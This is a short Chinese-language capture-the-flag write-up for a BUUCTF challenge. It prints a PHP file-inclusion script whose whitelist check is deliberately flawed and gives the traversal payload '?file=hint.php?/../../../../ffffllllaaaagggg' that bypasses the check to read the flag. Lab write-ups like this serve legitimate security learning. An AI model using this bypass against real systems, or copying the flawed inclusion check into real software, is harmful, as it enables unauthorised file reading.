BUUCTF第一题笔记

关于变量前加&

$a =& $b
?>

这意味着 $a 和 $b 指向了同一个变量。
注: $a 和 $b 在这里是完全相同的，这并不是 $a 指向了 $b 或者相反，而是 $a 和 $b 指向了同一个地方。

题目解析

首先我们在页面中发现了关键部分

拼接/source.php后得到一串php脚本代码

    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
             //isset() -- 检测变量是否设置，并且不是 NULL。
            //is_string() — 检测变量是否是字符串。
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
			
            if (in_array($page, $whitelist)) {
                return true;
            }
			//截取0到'?'前面的字符串
            //mb_substr($str,start,length)：在str中从start开始截取长度为length的中文字符串(起始位置为0)
            //mb_strpos() — 查找字符串在另一个字符串中首次出现的位置
         
         $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

构造?file=hint.php

REQUEST利用 …/ 跳转目录读取 flag，可以一次一次 …/ 尝试，我发现ffffllllaaaagggg都为四个，所以可能四次跳转，直接尝试。
?file=hint.php?/../../../../ffffllllaaaagggg
成功得到flag